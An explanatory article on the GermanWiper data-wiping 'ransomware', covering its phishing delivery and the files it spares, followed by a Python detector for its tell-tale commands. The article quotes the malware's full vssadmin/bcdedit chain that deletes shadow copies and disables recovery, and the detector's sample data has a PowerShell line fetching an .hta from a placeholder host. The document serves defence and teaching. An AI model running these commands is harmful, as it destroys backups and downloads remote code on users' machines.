GermanWiper, A Diabolical Ransomware Targeting German PC Users
Have you heard of GermanWiper? No, it is not a brand of shaving razor or tissue paper in Germany. The name is very unfortunate, but it is another “ransomware” that is wreaking havoc in Germany and perhaps adjacent parts of Europe. Yes, “ransomware” in double quotes: in form it resembles other ransomware families, but its actions are totally diabolical in nature. Ransomware in its basic sense is a cybercriminal’s cash cow: encrypt the files of an innocent computer user, then demand money for their decryption.
This is where the “ransomware” features of GermanWiper end; its only purpose is to destroy user data. In its very code, GermanWiper is instructed to demand BTC 0.15038835 from the victims, and its authors even provided a valid Bitcoin address to complete the transaction. The normal behavior is for the ransomware’s command and control (C&C) servers to release the decryption key, unlock the files, and everyone lives happily ever after. With GermanWiper, after the payment for the “ransom” is received, it does not proceed with the decryption of the files; instead it executes its data-wipe instructions. All files that were previously encrypted are overwritten by a series of 0’s and 1’s, destroying the encrypted data for good.
The virus authors receive the payment, but in the process they also double-cross the user who paid the ransom. With the valuable data deleted for good by an intense overwrite, there is no hope of ever recovering it unless the user had a previously known-good backup. So how did the victims get infected by GermanWiper? Again, like any typical cybercriminal-made ransomware before it, it came from a phishing campaign. This time around, the target is within the territory of Germany.
The phishing campaign uses a “job application” format: the game plan is to send unsuspecting users an email from a job applicant under the name Lena Kretschmer. The email states her desire to apply for a job at the target’s company, with an attached zip file “containing” her CV and a fake PDF file. The PDF is nothing but a Windows shortcut file (a .lnk file) designed to launch PowerShell when opened, with an embedded instruction to download a malicious .hta file. The main module of GermanWiper is then downloaded to the user’s C:\Users\Public directory and executed.
The following folders are spared from being deleted:
- windows
- recycle.bin
- mozilla
- boot
- application data
- appdata
- program files
- program files (x86)
- programme
- programme (x86)
- programdata
- perflogs
- intel
- msocache
- system volume information
GermanWiper will also leave the following files alone:
- notepad.exe
- dbeng50.exe
- sqbcoreservice.exe
- encsvc.exe
- mydesktopservice.exe
- isqlplussvc.exe
- agntsvc.exe
- sql.exe
- sqld.exe
- mysql.exe
- mysqld.exe
- Oracle.exe
GermanWiper basically spares any file that Windows needs to work properly, but it will then delete any file that has nothing to do with the basic operation of Windows. Advanced users may depend on Windows Volume Shadow Copy to restore the deleted files, but the ransomware’s authors were already one step ahead:
cmd.exe /k vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
GermanWiper runs this through the command prompt: vssadmin deletes every Volume Shadow Copy, and the two bcdedit calls disable the Windows recovery environment and tell the boot loader to ignore all failures, so the built-in restore options are gone before the victim notices anything. As explained, all the wiping actions are done before the malware displays a notification to the user asking for the ransom payment (in the German language).
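The command chain above is a strong detection signal on its own. As an added example (not code from the article or from the malware analysis), the script below scans constructed process-creation events (Sysmon-style pid/image/command-line records, an assumed format) for the vssadmin and bcdedit recovery-inhibition commands quoted above and for the PowerShell-to-.hta delivery the article describes, and raises the severity when one chain both deletes shadows and disables recovery.

```python
import re
from typing import Dict, List

# Detection rules for the recovery-inhibition chain quoted in the article
# (vssadmin / bcdedit) and for the .lnk -> PowerShell -> .hta delivery.
# The patterns are this example's own assumptions, not vendor signatures.
RULES = {
    "shadow_copy_deletion": re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    "recovery_disabled": re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I),
    "boot_failures_ignored": re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I),
    # PowerShell referencing an .hta file anywhere on its command line.
    "powershell_hta_download": re.compile(r"powershell.*\.hta", re.I),
}

def classify(command_line: str) -> List[str]:
    """Return the names of every rule the command line matches, in rule order."""
    return [name for name, pat in RULES.items() if pat.search(command_line)]

def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Scan process-creation events (dicts with 'pid', 'image', 'cmdline') and
    return one finding per suspicious event. A single chain that both deletes
    shadow copies and disables recovery is rated 'high'; anything else 'medium'."""
    findings = []
    for ev in events:
        hits = classify(ev["cmdline"])
        if not hits:
            continue
        high = {"shadow_copy_deletion", "recovery_disabled"} <= set(hits)
        findings.append({"pid": ev["pid"], "image": ev["image"],
                         "rules": hits, "severity": "high" if high else "medium"})
    return findings

# Constructed sample events; the first cmdline is the one quoted in the article.
SAMPLE_EVENTS = [
    {"pid": "4120", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /k vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"},
    {"pid": "3977", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c Invoke-WebRequest http://example.invalid/Bewerbung.hta -OutFile C:\Users\Public\Bewerbung.hta"},
    {"pid": "512", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe Bewerbung.txt"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Real deployments should feed this from Sysmon Event ID 1 or Windows Security Event 4688 with command-line logging enabled; without command-line auditing the bcdedit and vssadmin arguments are never recorded.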